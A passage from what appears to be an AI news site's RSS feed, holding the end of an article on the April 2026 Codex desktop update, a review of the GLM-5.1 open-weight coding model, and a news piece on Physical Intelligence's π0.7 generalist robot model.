          <td>Preview - no Enterprise, EU, UK</td>
          <td>No</td>
      </tr>
      <tr>
          <td>Pay-as-you-go</td>
          <td>Enterprise and Business</td>
          <td>API only</td>
      </tr>
  </tbody>
</table>
<h2 id="whats-new-in-the-april-16-update">What's New in the April 16 Update</h2>
<h3 id="background-computer-use">Background Computer Use</h3>
<p>The core feature of the update is computer use: Codex can see, click, and type into Mac apps while running in the background, without interfering with other work. Developers can run multiple agents simultaneously - one testing a mobile UI in Simulator while another pushes a commit - with each task isolated from the others.</p>
<p>OpenAI's <a href="https://developers.openai.com/codex/app/computer-use">developer documentation</a> is specific about scope. Codex can interact with windows, menus, keyboard input, and clipboard state in target apps. It cannot automate terminal apps or Codex itself (a deliberate security restriction), and it cannot authenticate as an administrator or approve system permission prompts.</p>
<p>The permission model requires users to grant both macOS Screen Recording and Accessibility access, then selectively approve individual apps on a per-session basis.</p>
<p><img src="/images/news/openai-codex-computer-use-parallel-agents-approval.jpg" alt="Codex computer use approval dialog for a Mac app">
<em>The computer use approval dialog asks users to authorize each app individually before Codex can interact with it.</em>
<small>Source: developers.openai.com</small></p>
<h3 id="the-atlas-browser">The Atlas Browser</h3>
<p>Alongside computer use, Codex now ships with a built-in browser built on OpenAI's proprietary Atlas engine. In its current form, it lets developers comment directly on pages served from local dev servers, giving the agent precise context about which elements to modify without switching to an external browser.</p>
<p>OpenAI's stated intent is to expand Atlas to &quot;fully command the browser beyond web applications on localhost&quot; - meaning general web browsing - but that isn't live yet.</p>
<h3 id="image-generation-and-visual-tooling">Image Generation and Visual Tooling</h3>
<p>Image generation via gpt-image-1.5 is now available directly inside Codex threads. The use cases are narrow but practical: generating placeholder images, iterating on mockup concepts, and creating slide visuals without leaving the development environment. Rich file previews for PDFs and spreadsheets, multiple terminal tabs, GitHub review integration, and artifact previews round out the quality-of-life additions in this release.</p>
<h2 id="111-plugins-the-app-store-moment">111 Plugins: The App Store Moment</h2>
<p>OpenAI has added 111 new plugins to the <a href="/news/openai-codex-plugin-marketplace/">Codex plugin ecosystem</a>, bringing together skills, app integrations, and MCP server configurations into a single installable unit. Named integrations include Atlassian Rovo, CircleCI, CodeRabbit, GitLab Issues, Microsoft Suite, and Render.</p>
<p>The framing from OpenAI is that plugins let teams package reusable workflows - for example, a plugin that reads a project's Slack channel and Google Calendar to create a daily task list, then routes issues to the appropriate agent.</p>
<p><img src="/images/news/openai-codex-computer-use-parallel-agents-multitask.jpg" alt="Codex multitask interface showing parallel agents">
<em>Codex running multiple tasks in parallel inside the desktop app.</em>
<small>Source: developers.openai.com</small></p>
<p>Also added: thread reuse so agents can resume interrupted work, and long-horizon scheduling that lets Codex work across tasks that span days or weeks. Memory - a preview feature that lets Codex recall preferences, tech stacks, and workflow patterns across sessions - completes the picture, though its availability is sharply restricted (more on that below).</p>
<h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2>
<h3 id="the-geography-problem">The Geography Problem</h3>
<p>Computer use isn't available in the European Economic Area, the United Kingdom, or Switzerland. Memory is similarly unavailable for Enterprise, Education, EU, and UK users. These are two of the four headline features in this update. For organizations operating under GDPR or UK data protection law - which includes a major share of enterprise software teams - the April 16 update delivers less than the headlines suggest.</p>
<p>The restrictions aren't accidental; they reflect the regulatory pressure that makes screen-recording-based computer use truly difficult to ship in Europe. OpenAI hasn't said when, or whether, these restrictions will lift.</p>
<h3 id="the-memory-fine-print">The Memory Fine Print</h3>
<p>The memory feature is in preview and excluded from Enterprise accounts - the segment most likely to need persistent workflow context. Individual users on Pro, Max, and Team plans can access it, but Enterprise deployments remain stateless. Teams assessing Codex for professional workflows should treat memory as aspirational for now, not a production capability.</p>
<h3 id="the-browser-ceiling">The Browser Ceiling</h3>
<p>The Atlas browser is built for localhost development. Pointing it at production URLs or external services is outside its current scope. The roadmap phrase &quot;fully command the browser&quot; is OpenAI acknowledging that the current implementation is incomplete - not announcing a feature that exists today.</p>
<hr>
<p>Taken overall, this update closes a visible gap between Codex and <a href="/leaderboards/coding-benchmarks-leaderboard/">Claude Code's agentic capabilities</a>. The computer use architecture, the plugin depth, and the Atlas browser represent genuine additions that enterprise developers will want to evaluate. The geographic restrictions and the memory exclusions are real constraints that'll matter to a large share of professional users. OpenAI is catching up - but in parts of the world where it counts most commercially, Anthropic still has the open field.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://techcrunch.com/2026/04/16/openai-takes-aim-at-anthropic-with-beefed-up-codex-that-gives-it-more-power-over-your-desktop/">OpenAI Codex April 2026 Update - TechCrunch</a></li>
<li><a href="https://developers.openai.com/codex/app/computer-use">Codex Computer Use - OpenAI Developer Docs</a></li>
<li><a href="https://www.macrumors.com/2026/04/16/openai-codex-mac-update/">OpenAI Codex Mac Update - MacRumors</a></li>
<li><a href="https://9to5mac.com/2026/04/16/openais-codex-app-adds-three-key-features-for-expanding-beyond-agentic-coding/">Codex Three Key Features - 9to5Mac</a></li>
<li><a href="https://smartscope.blog/en/generative-ai/chatgpt/codex-desktop-major-update-april-2026/">SmartScope Codex Desktop Update Analysis</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/openai-codex-computer-use-parallel-agents_hu_3aca93d3a027b51f.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/openai-codex-computer-use-parallel-agents_hu_3aca93d3a027b51f.jpg" width="1200" height="675"/></item><item><title>GLM-5.1 Review: Open-Source Model Tops SWE-Bench Pro</title><link>https://awesomeagents.ai/reviews/review-glm-5-1/</link><pubDate>Fri, 17 Apr 2026 17:57:45 +0200</pubDate><guid>https://awesomeagents.ai/reviews/review-glm-5-1/</guid><description>&lt;p>On April 7, 2026, Z.ai (formerly Zhipu AI) released the weights of GLM-5.1 under the MIT license and posted a benchmark table that made a lot of AI engineers do a double take. A 754-billion-parameter open-weight model, trained completely on Huawei Ascend chips with no US silicon, had taken the top score on SWE-Bench Pro - beating GPT-5.4 and &lt;a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6&lt;/a>. The two-point margin is modest, but the symbolic weight is not.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>On April 7, 2026, Z.ai (formerly Zhipu AI) released the weights of GLM-5.1 under the MIT license and posted a benchmark table that made a lot of AI engineers do a double take. A 754-billion-parameter open-weight model, trained completely on Huawei Ascend chips with no US silicon, had taken the top score on SWE-Bench Pro - beating GPT-5.4 and <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a>. The two-point margin is modest, but the symbolic weight is not.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li><strong>8.1/10</strong> - the best open-weight model for long-horizon agentic coding, with caveats</li>
<li>Tops SWE-Bench Pro (58.4) ahead of GPT-5.4 (57.7) and Claude Opus 4.6 (57.3); also leads CyberGym with 68.7</li>
<li>Text-only (no vision), slower generation speed, and key benchmark numbers come from Z.ai's own testing</li>
<li>Use it if you're building autonomous coding agents or long-running engineering pipelines; skip it if you need real-time IDE completions or multimodal workflows</li>
</ul>
</div>
<h2 id="where-glm-51-comes-from">Where GLM-5.1 Comes From</h2>
<p>Z.ai is a Beijing-based lab spun out of Tsinghua University's KEG research group. The company appeared on the US Entity List in January 2025, cutting off legal access to Nvidia's H100, H200, and B200 GPUs. Most frontier AI labs outside China treat those chips as oxygen. Z.ai had to build without them.</p>
<p>The entire GLM-5 family - including 5.1 - was trained on around 100,000 Huawei Ascend 910B chips running MindSpore, Huawei's homegrown deep learning framework. The decision wasn't ideological. It was the only available path under US export controls. That constraint makes the benchmark results much more interesting than they'd be otherwise.</p>
<p>On January 8, 2026, Zhipu completed a Hong Kong IPO - the first publicly traded foundation model company in the world - raising roughly HKD 4.35 billion (around $558 million USD) at a valuation near $31.3 billion. The GLM-5.1 release came three months later, and the timing isn't coincidental. The company needs to justify that valuation with technical output.</p>
<p>The GLM-5 base model <a href="/news/glm-5-china-frontier-model-huawei-chips/">launched in February 2026</a>. GLM-5.1 is a post-training refinement focused specifically on agentic coding tasks and long-horizon execution. The architecture is unchanged; the improvements come from training methodology.</p>
<h2 id="architecture-and-specifications">Architecture and Specifications</h2>
<p>GLM-5.1 uses a Mixture-of-Experts design the company calls GLM_MOE_DSA (Dynamic Sparse Attention), with 754 billion total parameters and 40 billion active per forward pass. That active-parameter count places it in the same inference-compute neighborhood as models like <a href="/reviews/review-deepseek-v3-2/">DeepSeek V3.2</a> and <a href="/reviews/review-kimi-k2-5/">Kimi K2.5</a>, which both use similar MoE approaches.</p>
<div class="news-tldr">
<p><strong>Key Specs</strong></p>
<table>
  <thead>
      <tr>
          <th>Spec</th>
          <th>Value</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Parameters (total)</td>
          <td>754B (MoE)</td>
      </tr>
      <tr>
          <td>Active parameters</td>
          <td>40B per token</td>
      </tr>
      <tr>
          <td>Context window</td>
          <td>200,000 tokens</td>
      </tr>
      <tr>
          <td>Max output tokens</td>
          <td>128,000</td>
      </tr>
      <tr>
          <td>Modalities</td>
          <td>Text only</td>
      </tr>
      <tr>
          <td>License</td>
          <td>MIT</td>
      </tr>
      <tr>
          <td>Training hardware</td>
          <td>Huawei Ascend 910B</td>
      </tr>
      <tr>
          <td>Release date</td>
          <td>April 7, 2026</td>
      </tr>
  </tbody>
</table>
</div>
<p>The 200K context window with 128K maximum output is a truly generous combination - most frontier models cap output at 32K or 64K. For long-horizon agentic tasks that generate large code artifacts or iterate across many files, that ceiling matters.</p>
<p>Supported inference frameworks include SGLang (v0.5.10+), vLLM (v0.19.0+), Transformers, KTransformers, and xLLM. Ollama also has the model in its library. The API supports function calling, streaming, structured outputs, context caching, and a thinking mode for extended reasoning.</p>
<p><img src="/images/reviews/review-glm-5-1-chips.jpg" alt="Close-up macro photograph of intricate electronic circuit board components">
<em>GLM-5.1's training ran on Huawei Ascend 910B chips - no NVIDIA hardware anywhere in the stack.</em>
<small>Source: pexels.com</small></p>
<h2 id="benchmarks">Benchmarks</h2>
<p>The headline number is SWE-Bench Pro, but GLM-5.1's benchmark profile is more varied than the press releases suggest.</p>
<table>
  <thead>
      <tr>
          <th>Benchmark</th>
          <th>GLM-5.1</th>
          <th>GPT-5.4</th>
          <th>Claude Opus 4.6</th>
          <th>Gemini 3.1 Pro</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>SWE-Bench Pro</td>
          <td><strong>58.4</strong></td>
          <td>57.7</td>
          <td>57.3</td>
          <td>54.2</td>
      </tr>
      <tr>
          <td>Terminal-Bench 2.0</td>
          <td>63.5</td>
          <td>-</td>
          <td><strong>68.5</strong></td>
          <td>-</td>
      </tr>
      <tr>
          <td>CyberGym</td>
          <td><strong>68.7</strong></td>
          <td>-</td>
          <td>66.6</td>
          <td>-</td>
      </tr>
      <tr>
          <td>GPQA-Diamond</td>
          <td>86.2</td>
          <td>-</td>
          <td>-</td>
          <td><strong>94.3</strong></td>
      </tr>
      <tr>
          <td>AIME 2026</td>
          <td>95.3</td>
          <td><strong>98.7</strong></td>
          <td>98.2</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>On coding-specific work, the picture is positive. SWE-Bench Pro tests real software engineering tasks - applying patches, fixing bugs, implementing features from natural language descriptions - and GLM-5.1's 58.4 is currently the highest public score on that leaderboard. It also leads CyberGym at 68.7, a security task completion benchmark across 1,507 tasks.</p>
<p>The gaps appear on general reasoning. AIME 2026 (advanced math competition problems) has GPT-5.4 at 98.7% and <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a> at 98.2%, while GLM-5.1 comes in at 95.3. GPQA-Diamond (graduate-level science reasoning) shows an even wider gap against Gemini 3.1 Pro's 94.3%. If your workload is heavy on mathematical derivations or scientific research, this isn't the model to reach for.</p>
<p>One thing worth noting: the SWE-Bench Pro results come from Z.ai's internal testing. Arena.ai independently placed GLM-5.1 third on their Code Arena agentic webdev leaderboard with an Elo rating of 1530, which provides at least partial external validation for the coding performance. But a fully independent evaluation on SWE-Bench Pro from a third-party lab hasn't been published as of this writing. Treat the exact margin over Claude and GPT-5.4 as preliminary.</p>
<h2 id="agentic-capabilities">Agentic Capabilities</h2>
<p>The most compelling part of GLM-5.1 isn't any individual benchmark score. It's the claim that the model can run autonomously for up to eight hours without human checkpoints, completing a full plan-execute-analyze-optimize loop across hundreds of iterations.</p>
<p>Z.ai demonstrated this with two tasks. First: building a complete Linux desktop environment from scratch - file browser, terminal, text editor, system monitor, and playable games - through 655 autonomous iterations in a single session. Second: optimizing a vector database over 178 rounds of autonomous tuning, improving throughput to 6.9 times the original baseline. In a separate CUDA kernel optimization task, the model improved speedup from 2.6x to 35.7x through sustained iterative refinement.</p>
<p>These are company-produced demos, so the usual skepticism applies. But the underlying technical approach - maintaining goal alignment across hundreds of tool calls without strategy drift - addresses a real failure mode of current agentic systems, where models lose context or start tuning for the wrong objective after a few dozen steps.</p>
<p>The practical implication: GLM-5.1 makes more sense as the backbone of an autonomous coding agent than as an interactive assistant. Plug it into a CI/CD pipeline, give it a ticket, and come back later. For real-time IDE completions where latency matters, <a href="/reviews/review-cursor-ide/">Cursor</a> or <a href="/reviews/review-claude-code-cli/">Claude Code</a> with a faster model will feel more responsive.</p>
<p><img src="/images/reviews/review-glm-5-1-circuit.jpg" alt="Abstract close-up of electronic circuit pathways glowing in blue light">
<em>GLM-5.1 is built for long-running agentic loops, not fast interactive completions.</em>
<small>Source: pexels.com</small></p>
<div class="pull-quote">
<p>GLM-5.1 makes more sense as the backbone of an autonomous agent than as an interactive assistant. Give it a ticket and come back later.</p>
</div>
<h2 id="pricing-and-access">Pricing and Access</h2>
<p>The model weights are on Hugging Face at <code>zai-org/GLM-5.1</code> under a MIT license, which means unrestricted commercial use and self-hosting.</p>
<p>For API access, Z.ai prices GLM-5.1 at $0.95 per million input tokens and $3.15 per million output tokens, with cached inputs at $0.26 per million. Those prices sit comfortably below what Anthropic and OpenAI charge for their frontier models.</p>
<p>Z.ai also offers a subscription-tier Coding Plan aimed at developers who want integrated tooling rather than raw API access:</p>
<table>
  <thead>
      <tr>
          <th>Tier</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Lite</td>
          <td>~$10/month</td>
          <td>Basic access to GLM-5.1 and GLM-5-Turbo</td>
      </tr>
      <tr>
          <td>Pro</td>
          <td>~$30/month</td>
          <td>Full model suite, priority throughput</td>
      </tr>
      <tr>
          <td>Max</td>
          <td>~$80/month</td>
          <td>Near-unlimited usage of premium models</td>
      </tr>
  </tbody>
</table>
<p>Free-tier users get access to GLM-4.7-Flash and GLM-4.5-Flash at no cost, along with a small allocation of premium model credits.</p>
<p>Local deployment works with standard frameworks. On a NVIDIA DGX Spark or equivalent multi-GPU setup, you can run the FP8-quantized variant (<code>zai-org/GLM-5.1-FP8</code>) with reduced memory requirements. The full BF16 weights need substantially more VRAM - this isn't a laptop model.</p>
<h2 id="strengths">Strengths</h2>
<ul>
<li><strong>SWE-Bench Pro leader</strong>: 58.4 is the highest public score on the benchmark that best predicts real-world software engineering performance</li>
<li><strong>Genuinely long autonomous execution</strong>: eight-hour uninterrupted agentic sessions with maintained goal alignment aren't something most models can do</li>
<li><strong>MIT license with commercial use</strong>: no restrictions, self-hostable, no vendor lock-in</li>
<li><strong>Competitive API pricing</strong>: at $0.95/$3.15 per million tokens, it undercuts frontier closed-source models</li>
<li><strong>Deep engineering toolkit</strong>: function calling, context caching, MCP integration, structured outputs, thinking mode - all there</li>
<li><strong>CyberGym leader</strong>: 68.7 on security task completion ahead of Claude Opus 4.6's 66.6</li>
</ul>
<h2 id="weaknesses">Weaknesses</h2>
<ul>
<li><strong>Text-only</strong>: no image, audio, or video input while GPT-5.4, Claude Opus 4.6, and Gemini 3.1 Pro are all multimodal</li>
<li><strong>Slower generation speed</strong>: 40-44 tokens/second against a competitive median above 53 t/s, which is noticeable in interactive use</li>
<li><strong>Verbose output</strong>: the model produces significantly more tokens than peers to reach equivalent answers, which inflates costs and latency</li>
<li><strong>Math and science gaps</strong>: AIME 2026 (95.3) and GPQA-Diamond (86.2) trail the frontier, making it a weaker choice for research or quantitative tasks</li>
<li><strong>Self-reported benchmarks</strong>: the SWE-Bench Pro score hasn't been independently verified by a third-party lab</li>
<li><strong>Young ecosystem</strong>: fewer community integrations and third-party tooling than Claude or OpenAI-compatible APIs</li>
</ul>
<h2 id="verdict">Verdict</h2>
<p>GLM-5.1 is the most capable open-weight model available for agentic software engineering work. The SWE-Bench Pro result is real - partially backed up by Arena.ai's independent Code Arena rankings - and the sustained eight-hour autonomous execution is a genuine differentiator for teams building long-running coding agents. The MIT license and competitive API pricing remove the usual friction of adopting a less-established model.</p>
<p>The weaknesses are real too. No multimodal input, slower token generation, and benchmark claims that haven't all been independently verified mean this isn't a drop-in replacement for Claude or GPT-5.4 across general workloads. For coding agents specifically - especially those that need to run overnight on complex engineering tasks - GLM-5.1 earns serious consideration.</p>
<p>The detail that makes the result interesting beyond the benchmark number: it was built entirely on Huawei silicon, by a lab that's been cut off from US chips for over a year. Whether that changes anything about how US policymakers think about export controls is a separate question. The technical fact is that the gap between Western and Chinese frontier models on coding tasks is now measured in decimal points.</p>
<p><strong>Score: 8.1 / 10</strong></p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://docs.z.ai/guides/llm/glm-5.1">GLM-5.1 Official Documentation - Z.ai</a></li>
<li><a href="https://huggingface.co/zai-org/GLM-5.1">zai-org/GLM-5.1 on Hugging Face</a></li>
<li><a href="https://www.marktechpost.com/2026/04/08/z-ai-introduces-glm-5-1-an-open-weight-754b-agentic-model-that-achieves-sota-on-swe-bench-pro-and-sustains-8-hour-autonomous-execution/">Z.AI Introduces GLM-5.1 - MarkTechPost</a></li>
<li><a href="https://artificialanalysis.ai/models/glm-5-1">GLM-5.1 - Artificial Analysis</a></li>
<li><a href="https://openrouter.ai/z-ai/glm-5.1">GLM-5.1 API Pricing - OpenRouter</a></li>
<li><a href="https://dataconomy.com/2026/04/08/z-ais-glm-5-1-tops-swe-bench-pro-beating-major-ai-rivals/">GLM-5.1 Tops SWE-Bench Pro - Dataconomy</a></li>
<li><a href="https://www.modemguides.com/blogs/ai-news/glm-5-1-open-source-benchmarks-local-ai">GLM-5.1 Open Source #1 on SWE-Bench Pro - ModemGuides</a></li>
<li><a href="https://www.buildfastwithai.com/blogs/glm-5-1-open-source-review-2026">GLM-5.1 Full Review - BuildFastWithAI</a></li>
<li><a href="https://lushbinary.com/blog/glm-5-1-benchmarks-breakdown-swe-bench-pro-nl2repo-cybergym/">GLM-5.1 Benchmarks Breakdown - Lushbinary</a></li>
<li><a href="https://z.ai/subscribe">Z.ai Coding Plan Pricing</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>Reviews</category><media:content url="https://awesomeagents.ai/images/reviews/review-glm-5-1_hu_362c5b792452e325.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/reviews/review-glm-5-1_hu_362c5b792452e325.jpg" width="1200" height="675"/></item><item><title>Physical Intelligence Launches π0.7 for Untrained Tasks</title><link>https://awesomeagents.ai/news/physical-intelligence-pi07-generalist-robot/</link><pubDate>Fri, 17 Apr 2026 16:56:58 +0200</pubDate><guid>https://awesomeagents.ai/news/physical-intelligence-pi07-generalist-robot/</guid><description><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/6awa03FFzAfzGQPI9BAI8H?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Physical Intelligence on April 16 unveiled π0.7, a generalist robot model that can tackle tasks it was never directly trained on - then match the performance of specialist models that were. It's a result that the robotics field has been chasing for years and that most researchers thought was still a few model generations away.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/6awa03FFzAfzGQPI9BAI8H?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Physical Intelligence on April 16 unveiled π0.7, a generalist robot model that can tackle tasks it was never directly trained on - then match the performance of specialist models that were. It's a result that the robotics field has been chasing for years and that most researchers thought was still a few model generations away.</p>
<div class="news-tldr">
<p><strong>Key Specs - π0.7</strong></p>
<table>
  <thead>
      <tr>
          <th>Spec</th>
          <th>Value</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Model type</td>
          <td>Vision-Language-Action (VLA) generalist</td>
      </tr>
      <tr>
          <td>Core claim</td>
          <td>Compositional generalization across unseen tasks</td>
      </tr>
      <tr>
          <td>Conditioning inputs</td>
          <td>Language, visual subgoals, metadata, control labels</td>
      </tr>
      <tr>
          <td>Training data sources</td>
          <td>Robot episodes, human demos, web VLM pretraining, RL policies</td>
      </tr>
      <tr>
          <td>Demonstrated tasks</td>
          <td>Laundry folding, espresso prep, box assembly, vegetable peeling, appliance operation</td>
      </tr>
      <tr>
          <td>Cross-embodiment</td>
          <td>UR5e industrial arm, bimanual desktop robots</td>
      </tr>
      <tr>
          <td>Specialist parity</td>
          <td>Matches RL-tuned π*0.6 across all tested tasks</td>
      </tr>
  </tbody>
</table>
</div>
<h2 id="what-π07-actually-does">What π0.7 Actually Does</h2>
<h3 id="a-generalist-that-rivals-specialists">A generalist that rivals specialists</h3>
<p>The headline result is that a single π0.7 model, with no task-specific fine-tuning, can match the success rates of Physical Intelligence's own π*0.6 specialist models - which were trained via a dedicated reinforcement learning algorithm called Recap specifically designed to maximize performance on individual tasks.</p>
<p>That matters because the standard path in robot learning has always been: train a new model (or fine-tune heavily) for every new task. Swapping out a laundry-folding robot for an espresso-making one isn't just a software update - it's a whole new training pipeline. π0.7 is an attempt to change that.</p>
<p>Co-founder Sergey Levine described the shift this way: &quot;Once it crosses that threshold where it goes from only doing exactly the trained tasks to actually remixing things in new ways, the capabilities are going up more than linearly.&quot; That's the same description researchers used for early large language models - where each new benchmark didn't just improve, it collapsed.</p>
<h3 id="the-air-fryer-experiment">The air fryer experiment</h3>
<p>The clearest demonstration of what the company means by &quot;compositional generalization&quot; is the air fryer test. π0.7 had exactly two relevant training episodes involving that appliance: one showing a robot pushing an air fryer closed, and one showing a robot placing a bottle inside. Neither episode involved cooking.</p>
<p>Given the instruction &quot;cook a sweet potato,&quot; with no additional coaching, the model attempted the task and failed. Given step-by-step verbal instructions (&quot;open the fryer, place the potato, set the timer&quot;), it succeeded - synthesizing fragments from tangential training data into functional behavior. The research team later found that the model probably learned air fryer context from the open-source DROID dataset, which includes footage of humans interacting with appliances. The robot never saw the specific task but absorbed enough about the appliance class to generalize.</p>
<p><img src="/images/news/physical-intelligence-pi07-generalist-robot-kitchen-demo.jpg" alt="π0.7 navigating a kitchen environment during the air fryer demonstration">
<em>A fisheye view from inside the robot's perception stack as it navigates the kitchen for the air fryer cooking experiment.</em>
<small>Source: pi.website</small></p>
<h2 id="architecture-three-layers-working-together">Architecture: Three Layers Working Together</h2>
<h3 id="the-policy-stack">The policy stack</h3>
<p>π0.7 is a Vision-Language-Action model built from three components that operate at different levels of abstraction:</p>
<ul>
<li><strong>High-level policy</strong>: creates language subgoals describing what the robot should achieve next</li>
<li><strong>World model</strong>: produces visual subgoals at inference time - literally predicting what the scene should look like after the next action</li>
<li><strong>Action expert</strong>: takes the multimodal context (camera frames, language instructions, predicted subgoals) and outputs low-level robot control commands</li>
</ul>
<p>The world model step is what makes compositional generalization plausible. Instead of mapping raw instructions directly to motor commands, the model first imagines what success looks like, then plans toward that image. This creates a natural bottleneck where learned skills from different domains can be mixed and matched through the visual prediction space.</p>
<h3 id="training-with-varied-conditioning">Training with varied conditioning</h3>
<p>The training methodology is built around what the team calls &quot;diverse multimodal conditioning&quot; - as opposed to naive data merging. Rather than throwing all robot episodes into a single training run with a fixed instruction format, π0.7 was trained with varied prompt structures:</p>
<ul>
<li>Language instructions describing tasks and subtasks at different granularities</li>
<li>Metadata flags specifying execution speed or quality level</li>
<li>Control modality labels showing whether the robot should use joint control or end-effector control</li>
<li>Visual subgoal images showing desired intermediate states</li>
</ul>
<p>The underlying data combined several sources: teleoperated robot episodes, human demonstrations captured with a different setup, web-scale vision-language pretraining (the same recipe that powers today's VLMs), and synthetic data created by running existing RL policies autonomously. The diversity of conditioning formats is what allows the model to be steered at inference time through plain language rather than requiring task-specific prompts.</p>
<h2 id="benchmark-comparison">Benchmark Comparison</h2>
<p>Physical Intelligence compared π0.7 against its own RL-tuned specialist models across the core task set. External benchmarks for generalist robot policies don't yet exist in any standardized form, so these numbers are self-reported.</p>
<table>
  <thead>
      <tr>
          <th>Task</th>
          <th>π0.7 (generalist)</th>
          <th>π*0.6 specialist (RL-tuned)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Laundry folding (t-shirts, shorts)</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Espresso preparation</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Box assembly</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Vegetable peeling</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Air fryer (unseen, coached)</td>
          <td>Succeeds</td>
          <td>N/A</td>
      </tr>
      <tr>
          <td>Cross-embodiment (UR5e)</td>
          <td>Matches human teleop</td>
          <td>Not evaluated</td>
      </tr>
  </tbody>
</table>
<p>The cross-embodiment result deserves closer reading: for the UR5e laundry-folding transfer, the comparison group was human teleoperators attempting the task on the target robot for the first time - subjects with about 375 hours of teleoperation experience. π0.7 matched their first-attempt success rates. That's a useful baseline exactly because it anchors the claim in observable human performance rather than a competing model number.</p>
<p><img src="/images/news/physical-intelligence-pi07-generalist-robot-laundry-demo.jpg" alt="π0.7 in a different physical setup during multi-task evaluation">
<em>The robot's on-board perception during a separate task evaluation in a non-kitchen environment.</em>
<small>Source: pi.website</small></p>
<h2 id="cross-embodiment-transfer">Cross-Embodiment Transfer</h2>
<p>One of the more surprising results is the cross-embodiment transfer: moving the laundry-folding capability from a small static bimanual desktop robot to a large UR5e industrial arm with markedly different morphology - different joint counts, different workspace geometry, different gripper design.</p>
<p>The model didn't require retraining for this. The cross-embodiment generalization comes from the control modality labels in the training data, which teach the model to reason about robot morphology as a conditioning variable rather than a fixed property. If the model has seen enough variations of arm kinematics during training, a new embodiment becomes one more conditioning input rather than a reason to start over.</p>
<p>Physical Intelligence has been documenting this arc for a while. Their <a href="/news/physical-ai-investment-surge-2026/">earlier investment round at an $11B valuation</a> in March was partly premised on exactly this kind of result - that the jump from task-specific to general-purpose robot policies was closer than the market believed. π0.7 is the first internal proof point they've released publicly.</p>
<p>The timing also puts Physical Intelligence directly in competition with Google DeepMind, whose <a href="/news/gemini-robotics-er-1-6-boston-dynamics/">Gemini Robotics-ER 1.6</a> launched in April for Boston Dynamics' Spot platform with a focus on embodied visual reasoning. Those are different bets - Google is pushing integration with commercial robot hardware, while Physical Intelligence is still building the foundation model layer. And Hugging Face's open-source <a href="/news/lerobot-v050-humanoid-open-source/">LeRobot v0.5.0</a> remains the accessible alternative for researchers who want to experiment without proprietary APIs.</p>
<h2 id="what-to-watch">What To Watch</h2>
<h3 id="what-the-demos-dont-prove">What the demos don't prove</h3>
<p>The key limitation is one Physical Intelligence states clearly: π0.7 can't execute multi-step tasks autonomously from a single high-level instruction. &quot;Make toast&quot; doesn't work. &quot;Open the toaster, place the bread, press the lever&quot; does. The coaching step is essential. The model has generalized skill components, not autonomous task planning.</p>
<p>That's a real gap. The practical value of a generalist robot in most commercial settings depends on reducing the amount of per-task human setup. If every new task still requires someone to decompose it into coached substeps, a lot of the generalization value moves from the robot to the operator.</p>
<h3 id="benchmark-opacity">Benchmark opacity</h3>
<p>The comparison data is self-reported, compared against Physical Intelligence's own prior models, with no external replication. The research community still lacks standardized robotics benchmarks that would let third parties verify claims like &quot;matches specialist performance.&quot; Until those exist, every result from any robotics lab - Physical Intelligence, Google DeepMind, NVIDIA - should carry a methodological asterisk. We've seen similar dynamics with <a href="/news/nvidia-alpamayo-100k-downloads-top-robotics-model/">NVIDIA's Alpamayo model</a>, where strong internal numbers didn't fully translate to external testing conditions.</p>
<h3 id="whats-actually-novel">What's actually novel</h3>
<p>Skepticism aside, the compositional generalization result is genuinely new if it holds up. Previous generalist robot models required fine-tuning to match specialist performance. π0.7's claim is that the gap is now zero, in the zero-shot direction. That's a meaningful threshold to cross.</p>
<p>The real test will come when external researchers get access to the model weights - Physical Intelligence hasn't showed a release timeline - and when the evaluation methodology gets stress-tested against tasks that sit further from the training distribution. The air fryer worked because DROID had relevant tangential data. The next test is something truly outside the training set.</p>
<hr>
<p>Physical Intelligence's next public benchmark is whether the model generalizes to tasks where no tangential data exists at all - a question the company hasn't answered yet, and one the broader field will be watching closely.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://www.pi.website/blog/pi07">Physical Intelligence π0.7 announcement</a></li>
<li><a href="https://techcrunch.com/2026/04/16/physical-intelligence-a-hot-robotics-startup-says-its-new-robot-brain-can-figure-out-tasks-it-was-never-taught/">Physical Intelligence, a hot robotics startup, says its new robot brain can figure out tasks it was never taught - TechCrunch</a></li>
</ul>
